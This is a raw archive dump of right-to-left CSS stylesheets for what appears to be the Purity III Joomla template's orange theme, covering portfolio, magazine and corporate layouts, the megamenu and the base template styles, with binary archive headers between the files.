}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #ff8800;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  left: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKӜ�\�.��/purity_iii/css/rtl/orange/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKӜ�\�,��.purity_iii/css/rtl/orange/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  display: table;
  content: " ";
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
  top: -1px;
  right: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #ff8800;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-left: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKӜ�\�d���=�=&purity_iii/css/rtl/orange/megamenu.cssnu&1i�.t3-megamenu .mega-inner:before,
.t3-megamenu .mega-inner:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-inner:after {
  clear: both;
}
.t3-megamenu .mega > .mega-dropdown-menu {
  min-width: 200px;
  display: none;
}
.t3-megamenu .mega.open > .mega-dropdown-menu,
.t3-megamenu .mega.dropdown-submenu.open > .mega-dropdown-menu {
  display: block;
}
.t3-megamenu .mega-group:before,
.t3-megamenu .mega-group:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group:after {
  clear: both;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-group-ct:before,
.t3-megamenu .mega-group-ct:after {
  display: table;
  content: " ";
}
.t3-megamenu .mega-group-ct:after {
  clear: both;
}
.t3-megamenu .mega-nav,
.t3-megamenu .dropdown-menu .mega-nav {
  margin: 0;
  padding: 0;
  list-style: none;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  list-style: none;
  margin-right: 0;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  white-space: normal;
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-nav > li a:hover,
.t3-megamenu .dropdown-menu .mega-nav > li a:hover,
.t3-megamenu .mega-nav > li a:focus,
.t3-megamenu .dropdown-menu .mega-nav > li a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.t3-megamenu .mega-nav > li .separator {
  display: block;
  padding: 5px;
}
.t3-megamenu .mega-group > .mega-nav,
.t3-megamenu .dropdown-menu .mega-group > .mega-nav {
  margin-right: -5px;
  margin-left: -5px;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-left: 5px;
}
.t3-megamenu .t3-module {
  margin-bottom: 10px;
}
.t3-megamenu .t3-module .module-title {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  margin-bottom: 5px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module .module-ct {
  margin: 0;
  padding: 0;
}
.t3-megamenu .mega-caption {
  display: block;
  white-space: nowrap;
}
.t3-megamenu .nav .caret,
.t3-megamenu .dropdown-submenu .caret,
.t3-megamenu .mega-menu .caret {
  display: none;
}
.t3-megamenu .nav > .dropdown > .dropdown-toggle .caret {
  display: inline-block;
}
.t3-megamenu .nav [class^="icon-"],
.t3-megamenu .nav [class*=" icon-"],
.t3-megamenu .nav .fa {
  margin-left: 5px;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-left: 0;
}
.t3-megamenu .mega-align-left > .dropdown-menu {
  right: 0;
}
.t3-megamenu .mega-align-right > .dropdown-menu {
  right: auto;
  left: 0;
}
.t3-megamenu .mega-align-center > .dropdown-menu {
  right: 50%;
  -webkit-transform: translate(-50%, 0);
  -ms-transform: translate(-50%, 0);
  -o-transform: translate(-50%, 0);
  transform: translate(-50%, 0);
}
.t3-megamenu .dropdown-submenu.mega-align-left > .dropdown-menu {
  right: 100%;
}
.t3-megamenu .dropdown-submenu.mega-align-right > .dropdown-menu {
  right: auto;
  left: 100%;
}
.t3-megamenu .mega-align-justify {
  position: static;
}
.t3-megamenu .mega-align-justify > .dropdown-menu {
  right: 0;
  margin-right: 0;
  top: auto;
}
.t3-megamenu .mega-tab > div {
  position: relative;
}
.t3-megamenu .mega-tab > div > ul {
  width: 200px;
}
.t3-megamenu .mega-tab > div > ul > li {
  position: static;
}
.t3-megamenu .mega-tab > div > ul > li > .dropdown-menu {
  position: absolute;
  top: 0;
  left: 0;
  bottom: 0;
  right: 200px;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu {
  border: none;
  box-shadow: none;
}
.t3-megamenu .mega-tab > div > ul > li > .mega-dropdown-menu > div {
  opacity: 1 !important;
  margin-right: 0 !important;
  transition: none !important;
}
@media (min-width: 991px) {
  .t3-megamenu.animate .mega > .mega-dropdown-menu {
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    opacity: 0;
  }
  .t3-megamenu.animate .mega.animating > .mega-dropdown-menu {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    display: block;
  }
  .t3-megamenu.animate .mega.open > .mega-dropdown-menu,
  .t3-megamenu.animate .mega.animating.open > .mega-dropdown-menu {
    opacity: 1;
  }
  .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0);
    -ms-transform: scale(0, 0);
    -o-transform: scale(0, 0);
    transform: scale(0, 0);
    -webkit-transform-origin: 20% 20%;
    -moz-transform-origin: 20% 20%;
    -ms-transform-origin: 20% 20%;
    transform-origin: 20% 20%;
  }
  .t3-megamenu.animate.zoom .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
    -webkit-transform: scale(0, 0) translate(-50%, 0);
    -ms-transform: scale(0, 0) translate(-50%, 0);
    transform: scale(0, 0) translate(-50%, 0);
    -webkit-transform-origin: 0% 20%;
    -moz-transform-origin: 0% 20%;
    -ms-transform-origin: 0% 20%;
    transform-origin: 0% 20%;
  }
  .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
    transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .mega > .mega-dropdown-menu {
    -webkit-transform: scale(0, 1);
    -ms-transform: scale(0, 1);
    -o-transform: scale(0, 1);
    transform: scale(0, 1);
    -webkit-transform-origin: 10% 0;
    -moz-transform-origin: 10% 0;
    -ms-transform-origin: 10% 0;
    transform-origin: 10% 0;
  }
  .t3-megamenu.animate.elastic .mega.open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega > .mega-dropdown-menu {
    -webkit-transform: scale(1, 0);
    -ms-transform: scale(1, 0);
    -o-transform: scale(1, 0);
    transform: scale(1, 0);
  }
  .t3-megamenu.animate.elastic .level0 .open > .mega-dropdown-menu {
    -webkit-transform: scale(1, 1);
    -ms-transform: scale(1, 1);
    -o-transform: scale(1, 1);
    transform: scale(1, 1);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
    transform: scale(1, 0) translate(-50%, 0);
    -webkit-transform: scale(1, 0) translate(-50%, 0);
    -ms-transform: scale(1, 0) translate(-50%, 0);
  }
  .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
    transform: scale(1, 1) translate(-50%, 0);
    -webkit-transform: scale(1, 1) translate(-50%, 0);
    -ms-transform: scale(1, 1) translate(-50%, 0);
  }
  .t3-megamenu.animate.slide .mega {
    
    
  }
  .t3-megamenu.animate.slide .mega.animating > .mega-dropdown-menu {
    overflow: hidden;
  }
  .t3-megamenu.animate.slide .mega > .mega-dropdown-menu > div {
    -webkit-transition: all 400ms;
    -o-transition: all 400ms;
    transition: all 400ms;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    margin-top: -30%;
  }
  .t3-megamenu.animate.slide .mega.open > .mega-dropdown-menu > div {
    margin-top: 0%;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu {
    min-width: 0;
  }
  .t3-megamenu.animate.slide .mega .mega > .mega-dropdown-menu > div {
    min-width: 200px;
    margin-top: 0;
    margin-right: -500px;
    width: 100%;
  }
  .t3-megamenu.animate.slide .mega .mega.open > .mega-dropdown-menu > div {
    margin-right: 0;
  }
}
@media (max-width: 990px) {
  .t3-megamenu .mega-inner:before,
  .t3-megamenu .mega-inner:after {
    display: table;
    content: " ";
  }
  .t3-megamenu .mega-inner:after {
    clear: both;
  }
  .t3-megamenu .row,
  .t3-megamenu .mega-dropdown-menu,
  .t3-megamenu .row [class*="col-lg-"],
  .t3-megamenu .row [class*="col-md-"],
  .t3-megamenu .row [class*="col-sm-"],
  .t3-megamenu .row [class*="col-xs-"] {
    width: 100% !important;
    min-width: 100% !important;
    right: 0 !important;
    margin-right: 0 !important;
    -webkit-transform: none !important;
    -ms-transform: none !important;
    transform: none !important;
  }
  .t3-megamenu .hidden-collapse,
  .t3-megamenu .always-show .caret,
  .t3-megamenu .always-show .dropdown-submenu > a:after .sub-hidden-collapse > .nav-child,
  .t3-megamenu .sub-hidden-collapse .caret,
  .t3-megamenu .sub-hidden-collapse > a:after {
    display: none !important;
  }
  .mega-caption {
    display: none !important;
  }
  html[dir="rtl"] .t3-megamenu .row,
  html[dir="rtl"] .t3-megamenu .mega-dropdown-menu,
  html[dir="rtl"] .t3-megamenu .row [class*="col-lg-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-md-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-sm-"],
  html[dir="rtl"] .t3-megamenu .row [class*="col-xs-"] {
    right: auto;
    left: 0 !important;
    margin-left: 0 !important;
  }
}
.t3-megamenu .mega-inner {
  padding: 20px 0;
}
.t3-megamenu .row {
  margin-right: auto;
  margin-left: auto;
}
.t3-megamenu .row + .row {
  padding-top: 10px;
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-dropdown-menu {
  color: #f7f7f7;
}
.t3-megamenu .mega-group {
  border: 0 !important;
}
.t3-megamenu .dropdown-header,
.t3-megamenu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header {
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
}
.t3-megamenu .dropdown-header:hover,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:hover,
.t3-megamenu .dropdown-header:active,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:active,
.t3-megamenu .dropdown-header:focus,
.t3-megamenu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .mega-nav .mega-group > .dropdown-header:focus,
.t3-megamenu .dropdown-menu .active .mega-nav .mega-group > .dropdown-header:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .mega-group-ct .row {
  margin-right: -20px;
  margin-left: -20px;
}
.t3-megamenu .mega-nav > li,
.t3-megamenu .dropdown-menu .mega-nav > li {
  border-bottom: 1px solid #515151;
}
.t3-megamenu .mega-nav > li:first-child,
.t3-megamenu .dropdown-menu .mega-nav > li:first-child {
  border-top: 1px solid #515151;
}
.t3-megamenu .mega-nav > li a,
.t3-megamenu .dropdown-menu .mega-nav > li a {
  padding: 10px;
  color: #eeeeee;
}
.t3-megamenu .mega-nav > li.open > a,
.t3-megamenu .dropdown-menu .mega-nav > li.open > a {
  background: #515151;
}
.t3-megamenu .mega-nav > li.active > a,
.t3-megamenu .dropdown-menu .mega-nav > li.active > a {
  color: #ffffff;
  background: #515151;
}
.t3-megamenu .mega-nav .dropdown-submenu > a::after {
  margin-left: 0;
}
.t3-megamenu .t3-module .module-title {
  color: #eeeeee;
  margin: 0;
  padding: 0;
  background: transparent;
  color: inherit;
  font-size: 18px;
  line-height: normal;
  white-space: nowrap;
  margin-bottom: 20px;
}
.t3-megamenu .t3-module .module-title:hover,
.t3-megamenu .t3-module .module-title:active,
.t3-megamenu .t3-module .module-title:focus {
  background: inherit;
  color: inherit;
}
.t3-megamenu .t3-module ul,
.t3-megamenu .t3-module .nav {
  padding-right: 20px;
}
.t3-megamenu .t3-module ul li,
.t3-megamenu .t3-module .nav li {
  list-style: disc;
  display: list-item;
  float: none;
  margin: 0;
  padding: 0;
  border: 0;
}
.t3-megamenu .t3-module ul li a,
.t3-megamenu .t3-module .nav li a {
  display: inline;
  padding: 0;
  margin: 0;
  border: 0;
  font-size: 100%;
  background: none;
  font: inherit;
  white-space: normal;
  color: #f7f7f7;
}
.t3-megamenu .t3-module ul li a:hover,
.t3-megamenu .t3-module .nav li a:hover,
.t3-megamenu .t3-module ul li a:focus,
.t3-megamenu .t3-module .nav li a:focus,
.t3-megamenu .t3-module ul li a:active,
.t3-megamenu .t3-module .nav li a:active {
  background: transparent;
  color: #ff8800;
  font: inherit;
}
.t3-megamenu .mega-caption {
  color: #999999;
  font-size: 12px;
  margin-top: 3px;
  font-weight: normal;
}
.t3-megamenu .nav .input-group-addon [class^="icon-"],
.t3-megamenu .nav .input-group-addon [class*=" icon-"],
.t3-megamenu .nav .input-group-addon .fa {
  margin-left: 0;
}


html[dir="rtl"] .t3-megamenu .mega-align-center > .dropdown-menu {
  -webkit-transform: translate(50%, 0);
  -ms-transform: translate(50%, 0);
  -o-transform: translate(50%, 0);
  transform: translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu .mega-nav .dropdown-submenu > a:after {
  direction: ltr;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .mega > .mega-dropdown-menu {
  -webkit-transform-origin: 80% 20%;
  -moz-transform-origin: 80% 20%;
  -ms-transform-origin: 80% 20%;
  transform-origin: 80% 20%;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .level0 > .mega-align-center > .mega-dropdown-menu {
  -webkit-transform: scale(0, 0) translate(50%, 0);
  -ms-transform: scale(0, 0) translate(50%, 0);
  transform: scale(0, 0) translate(50%, 0);
  -webkit-transform-origin: 100% 20%;
  -moz-transform-origin: 100% 20%;
  -ms-transform-origin: 100% 20%;
  transform-origin: 100% 20%;
}
html[dir="rtl"] .t3-megamenu.animate.zoom .level0 > .mega-align-center.open > .mega-dropdown-menu {
  -webkit-transform: scale(1, 1) translate(50%, 0);
  -ms-transform: scale(1, 1) translate(50%, 0);
  transform: scale(1, 1) translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu.animate.elastic .level0 > .mega-align-center > .mega-dropdown-menu {
  transform: scale(1, 0) translate(50%, 0);
  -webkit-transform: scale(1, 0) translate(50%, 0);
  -ms-transform: scale(1, 0) translate(50%, 0);
}
html[dir="rtl"] .t3-megamenu.animate.elastic .level0 > .mega-align-center.open > .mega-dropdown-menu {
  transform: scale(1, 1) translate(50%, 0);
  -webkit-transform: scale(1, 1) translate(50%, 0);
  -ms-transform: scale(1, 1) translate(50%, 0);
}PKӜ�\]w�q Z Z&purity_iii/css/rtl/orange/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: right;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #ff8800;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #b35f00;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: right;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #ff8800;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: right;
}
.text-right {
  text-align: left;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-right: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-right: 0;
  list-style: none;
}
.list-inline {
  padding-right: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-right: 5px;
  padding-left: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-right: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: right;
    width: 160px;
    clear: right;
    text-align: left;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-right: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    display: table;
    content: " ";
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-right: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-left: 15px;
  padding-right: 0;
  border-left: 5px solid #eeeeee;
  border-right: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: left;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
